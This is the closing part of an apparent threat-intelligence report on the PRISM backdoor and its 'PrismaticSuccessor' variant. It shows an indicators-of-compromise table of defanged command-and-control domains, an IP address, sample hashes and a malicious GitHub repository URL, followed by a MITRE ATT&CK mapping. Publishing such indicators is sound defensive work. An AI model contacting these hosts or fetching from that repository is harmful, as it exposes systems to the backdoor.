			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SUBDOMAIN</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
zzz.457467[.]com</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control server</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
DOMAIN</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
rammus[.]me</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control server</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SUBDOMAIN</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
s.rammus[.]me</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control server</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SUBDOMAIN</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
sw.rammus[.]me</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control server</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
DOMAIN</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
wa1a1[.]com</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control server</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SUBDOMAIN</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
www.wa1a1[.]com</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control server</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
DOMAIN</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
waterdropx[.]com</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control server</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SUBDOMAIN</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
r.waterdropx[.]com</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control server</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SUBDOMAIN</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
spmood222.mooo[.]com</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control server</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
933b4c6c48f82bbb62c9b1a430c7e758b88c03800c866b36c2da2a5f72c93657</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PrismaticSuccessor (packed)</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
aaeee0e6f7623f0087144e6e318441352fef4000e7a8dd84b74907742c244ff5</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PrismaticSuccessor (unpacked)</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
baf2fa00711120fa43df80b8a043ecc0ad26edd2c5d966007fcd3ffeb2820531</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PrismaticSuccessor (packed)</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
f19043c7b06db60c8dd9ff55636f9d43b8b0145dffe4c6d33c14362619d10188</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM backdoor</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
eeabee866fd295652dd3ddbc7552a14953d91b455ebfed02d1ccdee6c855718d</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM backdoor</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
3a4998bb2ea9f4cd2810643cb2c1dae290e4fe78e1d58582b6f49b232a58575a</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM backdoor</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
3366676681a31feadecfe7d0f5db61c4d6085f5081b2d464b6fe9b63750d4cd8</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM backdoor</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
cc3752cc2cdd595bfed492a2f108932c5ac28110f5f0d30de8681bd10316b824</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PrismaticSuccessor (packed)</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
baf2fa00711120fa43df80b8a043ecc0ad26edd2c5d966007fcd3ffeb2820531</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PrismaticSuccessor (packed)</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
eb64ee2b6fc52c2c2211018875e30ae8e413e559bcced146af9aa84620e3312f</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM backdoor</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
d1d65b9d3711871d8f7ad1541cfbb7fa35ecc1df330699b75dd3c1403c754278</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM backdoor</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
77ddc6be62724ca57ff45003c5d855df5ff2b234190290545b064ee4e1145f63</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PrismaticSuccessor (packed)</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
1de9232f0bec9bd3932ae3a7a834c741c4c378a2350b4bbb491a102362235017</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM backdoor</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
7ed15e59a094ca0f9ccac4c02865172ad67dcfc5335066f67fe3f11f68dd7473</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM backdoor</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
1eb6973f70075ede421bed604d7642fc844c5a47c53d0fb7a9ddb21b0bb2519a</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM backdoor</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
6f983303bb82d8cc9e1ebf8c6c1eb7c17877debc66cd1ac7c9f78b24148a4e46</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM backdoor</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
e4fe57d9d2c78a097f38cba7a9aad7ca53da24ecbcad0c1e00f21d34d8a82de4</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM backdoor</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
SHA256</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
b08d48cc12c6afa5821a069bd6895175d5db4b5a9dde4e04d587c3dec68b1920</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
PRISM backdoor</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
DOMAIN</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
z0gg[.]me</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
DOMAIN</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
x63[.]in</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
DOMAIN</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
x47[.]in</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
URL</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
hxxps://github[.]com/lirongchun/i/</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Malicious git repository</pre>
			</td>
		</tr>
		<tr>
			<td style="border-bottom:2px solid #959595; border-left:2px solid #959595; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
IP</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
45.199.88[.]86</pre>
			</td>
			<td style="border-bottom:2px solid #959595; border-left:none; border-right:2px solid #959595; border-top:none; height:33px; padding:24px;">
			<pre>
Command &amp; Control</pre>
			</td>
		</tr>
	</tbody>
</table>
</div>
<p>&nbsp;</p>
<h2>Mapped to MITRE ATT&amp;CK</h2>

<p>The findings of this report are mapped to the following <a href="https://attack.mitre.org/">MITRE ATT&amp;CK Matrix</a> tactics (TA identifiers) and, under each tactic, the techniques (T identifiers) observed:</p>

<ul>
	<li>TA0010: Exfiltration
	<ul>
		<li>T1041: Exfiltration Over C2 Channel</li>
	</ul>
	</li>
	<li>TA0002: Execution
	<ul>
		<li>T1059: Command and Scripting Interpreter</li>
	</ul>
	</li>
	<li>TA0005: Defense Evasion
	<ul>
		<li>T1027: Obfuscated Files or Information</li>
		<li>T1564: Hide Artifacts</li>
		<li>T1562: Impair Defenses</li>
		<li>T1014: Rootkit</li>
		<li>T1036: Masquerading</li>
	</ul>
	</li>
</ul>
									</div>
								</div>
							
							
							

							</div>
							
						</div>
					</div>
				</section>


			</main>


			

			
		




	<script type="text/javascript"  src="/2egU/Wdpn/GK/iIu0/Qw2w/Eab1DJkQ/UQF7/aUkrEWoA/QAUC"></script></body>
</html>
